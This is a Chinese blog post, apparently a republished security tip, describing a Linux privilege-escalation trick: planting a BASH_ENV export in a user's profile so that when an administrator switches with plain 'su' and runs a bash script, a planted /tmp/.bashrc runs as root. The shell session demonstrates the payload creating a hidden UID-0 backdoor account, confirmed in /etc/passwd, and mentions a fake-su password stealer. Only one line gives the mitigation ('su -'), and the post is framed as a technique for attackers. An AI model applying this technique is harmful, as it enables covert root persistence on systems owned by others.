提权用的一个技巧 's

admin 2017年4月24日11:54:58评论255 views字数 1611阅读5分22秒阅读模式
摘要

作者:xi4oyu一个linux提权用的技巧,放出来全当找工作攒RP了。OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本

作者:xi4oyu

一个linux提权用的技巧,放出来全当找工作攒RP了。

OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本

一个test:

[[email protected] ~]$ echo $BASH_ENV

[[email protected] ~]$ export BASH_ENV=”/tmp/.bashrc”
[[email protected] ~]$ echo $BASH_ENV
/tmp/.bashrc

[[email protected] ~]$ cat /tmp/.bashrc
#!/bin/bash
echo “Hello”

[[email protected] ~]$ ls -l
-rwxrwxr-x 1 xiaoyu xiaoyu 22 2008-09-11 05:54 test.sh

[[email protected] ~]$ cat test.sh
#!/bin/bash
echo “kk”

[[email protected] ~]$ ./test.sh
Hello
kk

恩,很好,和我们预期的一样。看看我们怎么利用。

grep su ~/.bash_history

显示此用户有使用su登录root账户的特殊癖好。 以前我们遇到这种情况通常就是塞个fakesu.c进去。然后修改.bash_profile,建立个别名之类的东西。通过getpass来获得root 密码,记录,然后去除别名…..关键是管理员使用正确密码登录的时候也是会提示一次密码错误。遇到傻点的管理员可能就放过这个细节了,再输入一遍密码 就OK了。但是某些非人类admin会以最快的速度检查系统被入侵的迹象,外加啥啥啥,而且这种管理员改 root密码几乎是肯定的了。所以偷取下来的密码也没啥用处。恩,聪明的X客们一定知道我要做什么了。呵呵,先看看环境变量su后在不

[[email protected] ~]$ echo $BASH_ENV
/tmp/.bashrc
[[email protected] ~]$ su
Password:
[[email protected] xiaoyu]# echo $BASH_ENV
/tmp/.bashrc
啊哦,还在,OK,实验结束,实战:

[[email protected] tmp]$ echo ‘/usr/sbin/useradd -u 0 -o kk 2> /dev/null’ > /tmp/.bashrc
[[email protected] tmp]$ cat /tmp/.bashrc
/usr/sbin/useradd -u 0 -o kk 2> /dev/null
[[email protected] tmp]$ grep kk /etc/passwd
[[email protected] tmp]$ echo $BASH_ENV
/tmp/.bashrc
[[email protected] tmp]$ su
Password:
[[email protected] tmp]# cd /home/xiaoyu
[[email protected] xiaoyu]# ./test.sh
kk
[[email protected] xiaoyu]# grep kk /etc/passwd
kk:x:0:503::/home/kk:/bin/bash
[[email protected] xiaoyu]#

呵呵,改密码的语句我没加进去哦。自己想,呵呵,偶不知道,偶不知道

恩,关于怎么安置,和fakesu一样,在.bash_profile等地方export BASH_ENV变量…

如果要避免这种情况,使用su -登录root,估计没几个管理员记得这个指令吧..汗…

以后会慢慢放出一些小技巧,很多东西窝着窝着,自己都忘了…囧!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月24日11:54:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   提权用的一个技巧 'shttp://cn-sec.com/archives/45536.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息